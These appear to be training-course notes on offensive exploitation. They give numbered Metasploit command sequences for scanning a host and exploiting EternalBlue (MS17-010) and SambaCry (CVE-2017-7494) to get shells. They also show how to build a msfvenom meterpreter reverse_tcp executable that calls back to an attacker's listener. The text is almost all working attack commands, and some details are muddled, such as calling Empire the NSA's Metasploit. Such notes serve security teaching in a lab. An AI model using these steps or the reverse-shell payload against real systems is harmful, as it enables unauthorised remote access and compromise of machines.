G2s8

1. Grade 2 Session 8
2. =================
3. Console Based Exploitation 3
4. Windows 7 --> Eternal Blue
5. Samba Cry --> Eternal Red
6. Application Based Exploitation
7. Payload Based Exploitation
8. Post Exploitation --> Local Privilidge Escalation
9. GUI Based Exploitation --> Armitage
10.  
11. Console Based Exploitation 3
12. ----------------------------
13. Eternal Blue --> NSA Exploit leaked by Shadow Brokers
14. EternalBlue-Double Pulsar
15. dll --> Dynamic Linked Library File
16. Double Pulsar creates a malicious .dll file and eternal blue executes that malicious .dll file in the target system.
17. Shadow Brokers ---> Fuzzbunch.py
18. Empire --> MSF of NSA
19. Metasploit Module
20.  
21. Steps
22. =====
23. Open a terminal
24. 1. #arp-scan --local
25. Target IP Address --> 192.168.228.138
26. 2. #nmap 192.168.228.138
27. 3. #nmap -sS -sC -sV 192.168.228.138
28. 4. #nmap 192.168.228.138 --script vuln
29. CVE-2017-0143
30. Open another terminal, start metasploit framework
31. 5. #msfconsole
32. 6. #search CVE-2017-0143
33. 7. #use auxiliary/scanner/smb/smb_ms17_010
34. 8. #options
35. 9. #set rhosts 192.168.228.138
36. 10. #options
37. 11. #run
38. Host is vulnerable to the exploit
39. 12. #use exploit/windows/smb/ms17_010_eternalblue
40. 13. #show options
41. 14. #set rhost 192.168.228.138
42. 15. #options
43. 16. #exploit
44. C:/Windows/System32> --> I got the access of the command prompt
45. For Changing the payload
46. set payload windows/meterpreter/reverse_tcp
47.  
48. Samba Cry - Eternal Red
49. =======================
50. Is the vulnerability for Linux Based OS. SMBv2.
51. NSA Exploit leaked by Shadow Brokers.
52. Open a terminal
53. 1. #arp-scan --local
54. Target IP Address --> 192.168.228.151
55. 2. #nmap 192.168.228.151
56. 3. #nmap -sS -sC -sV 192.168.228.151
57. 4. #nmap 192.168.228.151 --script vuln
58. Open another terminal, start metasploit framework
59. 5. #search is_known_pipename
60. 6. #search cve-2017-7494
61. exploit/linux/samba/is_known_pipename
62. 7. #use exploit/linux/samba/is_known_pipename
63. 8. #info
64. 9. #options
65. 10. #set rhost 192.168.228.151
66. 11. #run
67. Will Give me raw shell --> Bash Shell
68.  
69. Application Based Exploitation
70. ==============================
71. Open the terminal, start with msfconsole
72. 1. #msfconsole
73. 2. #search payload/windows/meterpreter
74. payload/windows/meterpreter/reverse_tcp --> use
75. payload/windows/meterpreter_reverse_tcp
76. payload/windows/meterpreter/reverse_http
77. payload/windows/meterpreter_reverse_tcp
78.  
79. Open Another Terminal, for creating a payload - stub
80. 3. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe
81.  
82. -p --> selecting the payload
83. windows/meterpreter/reverse_tcp --> is the payload
84. lhost --> attacker's IP Address
85. lport --> Listening attacker's port
86. -f --> file format
87. exe --> executable file
88. > --> destination of the output
89. /root/Desktop/prasheel.exe --> is the output file
90.  
91. Go back to the first terminal, exploit, set the listening server
92. 4. #use exploit/multi/handler
93. 5. #show options
94. 6. #set payload windows/meterpreter/reverse_tcp
95. 7. #show options
96. 8. #set lport 8989
97. 9. #set lhost 192.168.0.25
98. 10. #exploit
99.  
100. Armitage --> GUI Based Exploitation
101. Graphical Version of Metasploit Framework